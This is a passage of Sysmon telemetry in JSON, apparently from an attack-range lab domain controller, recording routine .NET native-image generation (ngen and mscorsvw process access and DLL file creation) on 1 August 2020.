C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:18.900","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043E-5F25-0000-001090F60B00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6409,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:20.431\r\nProcessGuid: {A837DB8D-043E-5F25-0000-001090F60B00}\r\nProcessId: 2856\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b28-0\\System.Web.Services.dll\r\nCreationUtcTime: 2020-08-01 05:57:20.431","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:20.431","ProcessGuid":"{A837DB8D-043E-5F25-0000-001090F60B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b28-0\\System.Web.Services.dll","CreationUtcTime":"2020-08-01 05:57:20.431","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6410,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.478\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001058FB0B00}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.478","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001058FB0B00}","TargetProcessId":"4052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6411,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.478\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001058FB0B00}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.478","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001058FB0B00}","TargetProcessId":"4052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6412,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.493\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001058FB0B00}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.493","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001058FB0B00}","TargetProcessId":"4052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6413,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.525\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001037FE0B00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.525","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001037FE0B00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6414,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.525\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001037FE0B00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.525","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001037FE0B00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6415,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.525\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001037FE0B00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.525","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001037FE0B00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6416,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:20.618\r\nProcessGuid: {A837DB8D-0440-5F25-0000-001037FE0B00}\r\nProcessId: 4848\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12f0-0\\CustomMarshalers.dll\r\nCreationUtcTime: 2020-08-01 05:57:20.618","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:20.618","ProcessGuid":"{A837DB8D-0440-5F25-0000-001037FE0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12f0-0\\CustomMarshalers.dll","CreationUtcTime":"2020-08-01 05:57:20.618","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6417,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.650\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-001062010C00}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\